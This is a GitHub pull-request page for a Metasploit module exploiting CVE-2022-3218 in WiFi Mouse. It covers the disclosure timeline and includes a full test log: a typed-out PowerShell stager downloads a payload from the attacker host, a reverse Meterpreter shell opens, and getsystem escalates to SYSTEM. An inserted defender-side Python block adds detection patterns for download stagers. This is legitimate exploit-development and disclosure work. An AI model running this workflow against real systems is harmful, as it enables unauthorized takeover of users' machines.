
wifi mouse auth bypass to rce - CVE-2022-3218 #16985

Merged
merged 10 commits into from Sep 23, 2022

Conversation

h00die
Contributor

@h00die h00die commented Sep 5, 2022

This PR adds a new module to exploit an auth bypass to rce in 'wifi mouse'.

@H4rk3nz0 looks like you were the original author (and your twitter is gone), did you ever reach out to the company to responsibly disclose?

This is a neat exploit as you connect to the server, ask it to open cmd, then type out what you want on the user's screen. It's fun to watch shell code :).

There is 1 target: stager which has 2 cmdstagers:

  1. psh_invokewebrequest (default): this one types the command and pulls back the payload nice and fast. You should use it in almost all circumstances.
  2. certutil: it appears on the user's screen, and it's unreliable (needs ~3.5 min of solitude). If the user types anything or moves the focus to another window, the exploit will fail.

Verification

  • Install and start the software. I tried it on the one linked in EDB and the most recent one on the website.
  • Start msfconsole
  • use exploit/windows/misc/wifi_mouse_rce
  • Set rhost and lhost as required.
  • run
  • Verify it works via both methods (targets)
  • Document looks good
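The two cmdstagers described above (psh_invokewebrequest and certutil) both end in a download from the handler's HTTP server, which is what a defender can look for. The following is an added detection sketch, not code from the PR or the module; the process-creation records and the proxy-log line are constructed, and the user-agent family is the one PowerShell's Invoke-WebRequest sends.

```python
"""Added defender-side example, not code from the PR or the module: detection
sketches for the two cmdstager patterns the PR describes (psh_invokewebrequest
and certutil), run over constructed process-creation and proxy-log records."""
import re
from urllib.parse import urlsplit

# PowerShell download cmdlets/methods a typed-out stager relies on.
PSH_FETCH = re.compile(r"\b(invoke-webrequest|iwr|downloadstring|downloadfile)\b", re.I)
# certutil abused as a downloader: -urlcache plus a URL on the command line.
CERTUTIL_FETCH = re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)
# User-agent family Invoke-WebRequest sends (same family as in the PR's test run).
PSH_UA = re.compile(r"WindowsPowerShell/\d")
WEBLOG = re.compile(r'"GET (?P<url>https?://[^\s"]+) HTTP/[\d.]+".*"(?P<ua>[^"]*)"\s*$')

def classify_process(event):
    """Label a process-creation record {'parent': ..., 'cmdline': ...}, or return None."""
    parent = event.get("parent", "").lower()
    cmd = event.get("cmdline", "")
    if re.search(r"\bpowershell(\.exe)?\b", cmd, re.I) and PSH_FETCH.search(cmd):
        # cmd.exe as parent matches the "open cmd, type the command" flow described above.
        return "psh_invokewebrequest_stager" if parent.endswith("cmd.exe") else "powershell_download"
    if CERTUTIL_FETCH.search(cmd):
        return "certutil_stager"
    return None

def classify_weblog(line):
    """Flag a proxy-log line where a PowerShell user agent fetches from a non-standard port."""
    m = WEBLOG.search(line)
    if not m or not PSH_UA.search(m.group("ua")):
        return None
    parts = urlsplit(m.group("url"))
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return "powershell_fetch_nonstandard_port" if port not in (80, 443) else None

# Constructed sample records (hosts, paths and names are illustrative, not captured data).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'powershell -nop -w hidden -c "iwr http://10.0.0.5:8080/abc -OutFile stage.bin"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://10.0.0.5:8080/abc stage.bin"},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]
SAMPLE_LOG = ('10.0.0.9 - - [23/Sep/2022:14:19:28 -0500] "GET http://10.0.0.5:8080/abc HTTP/1.1" '
              '200 145 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859"')

def run_samples():
    """Run both classifiers over the constructed samples and return the labels."""
    return [classify_process(e) for e in SAMPLE_EVENTS] + [classify_weblog(SAMPLE_LOG)]
```

The parent-process check is what separates the "cmd opened on the user's desktop, then typed into" flow from ordinary scripted PowerShell downloads; both still get a label.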

@H4rk3nz0

H4rk3nz0 commented Sep 5, 2022

Hi @h00die ,

I made two attempts to get in contact with the developer through their email on their site. Despite my efforts to inform them of the password pin bypass they did not respond. It may be worthy of a CVE however I never did raise it to any CVE body. Awesome job on the well designed msf module. Let me know if you need anything else.

@h00die
Contributor Author

h00die commented Sep 5, 2022

@H4rk3nz0 do you have dates for when you reached out, and to what email (or a timeline in general you can share)? Just for making sure we have all the ducks in a line for the CVE

@H4rk3nz0

H4rk3nz0 commented Sep 5, 2022

@h00die I reached out on the 25th of Feb 2021 to developer email (wangshimeng@gmail.com). The same day as I discovered the flaw.

@h00die h00die mentioned this pull request Sep 7, 2022
@todb-r7

todb-r7 commented Sep 14, 2022

Hi @h00die thanks for the alert. I've reserved CVE-2022-3218 for this. Salient details:

Product name: WiFi Mouse (Mouse Server)
Vendor: Necta LLC
Version: 1.8.2.3
CWE-603: Use of Client-Side Authentication

Description: Due to a reliance on client-side authentication, the WiFi Mouse (Mouse Server) from Necta LLC’s authentication mechanism is trivially bypassed, which can result in remote code execution.

@h00die h00die marked this pull request as ready for review September 15, 2022 19:13
@gwillcox-r7 gwillcox-r7 self-assigned this Sep 19, 2022
Contributor

@gwillcox-r7 gwillcox-r7 left a comment


Reviewed documentation, review on module code to come next.

@H4rk3nz0

I see the layer 8 issue has arisen.

@h00die
Contributor Author

h00die commented Sep 21, 2022

Updated the docs with some of your changes, and a bunch of the review comments. Things should be clearer now for the stager/target stuff.

@gwillcox-r7
Contributor

Tested and working like a charm. Pushing up final minor edits for documentation purposes and then this will be good to land.

msf6 > use exploit/windows/misc/wifi_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/misc/wifi_mouse_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/wifi_mouse_rce) > set RHOSTS 172.20.16.241
RHOSTS => 172.20.16.241
msf6 exploit(windows/misc/wifi_mouse_rce) > set LHOST 172.20.18.73
LHOST => 172.20.18.73
msf6 exploit(windows/misc/wifi_mouse_rce) > show options

Module options (exploit/windows/misc/wifi_mouse_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LINEMAX  1020             yes       Maximum length of lines to send for stager method.  Smaller for more unstable connections.
   RHOSTS   172.20.16.241    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    1978             yes       Port WiFi Mouse Mouse Server runs on (TCP)
   SLEEP    1                yes       How long to sleep between commands
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.18.73     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   stager


msf6 exploit(windows/misc/wifi_mouse_rce) > exploit

[*] Started reverse TCP handler on 172.20.18.73:4444 
[*] 172.20.16.241:1978 - Opening command prompt
[*] 172.20.16.241:1978 - Typing out payload
[*] 172.20.16.241:1978 - Using URL: http://172.20.18.73:8080/e0YwYxi
[*] 172.20.16.241:1978 - Client 172.20.16.241 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859) requested /e0YwYxi
[*] 172.20.16.241:1978 - Sending payload to 172.20.16.241 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.20348.859)
[*] Sending stage (200774 bytes) to 172.20.16.241
[*] 172.20.16.241:1978 - Command Stager progress - 100.00% done (145/145 bytes)
[*] Meterpreter session 1 opened (172.20.18.73:4444 -> 172.20.16.241:60802) at 2022-09-23 14:19:28 -0500
[*] 172.20.16.241:1978 - Server stopped.

meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > sysinfo
Computer        : WIN-BR0CCBA815B
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DAFOREST
Logged On Users : 12
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@gwillcox-r7 gwillcox-r7 changed the title wifi mouse rce wifi mouse rce - CVE-2022-3218 Sep 23, 2022
@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 23, 2022
@gwillcox-r7 gwillcox-r7 merged commit 0908006 into rapid7:master Sep 23, 2022
23 checks passed
@gwillcox-r7 gwillcox-r7 changed the title wifi mouse rce - CVE-2022-3218 wifi mouse auth bypass to rce - CVE-2022-3218 Sep 23, 2022
@gwillcox-r7
Contributor

gwillcox-r7 commented Sep 23, 2022

Release Notes

A new module has been added for CVE-2022-3218, an unpatched (at the time of publication) authentication bypass in WiFi Mouse (Mouse Server) from Necta LLC which can be used to gain RCE as the user running WiFi Mouse (Mouse Server).

@h00die h00die deleted the mouse_server branch September 23, 2022 21:27
@h00die h00die mentioned this pull request Oct 7, 2022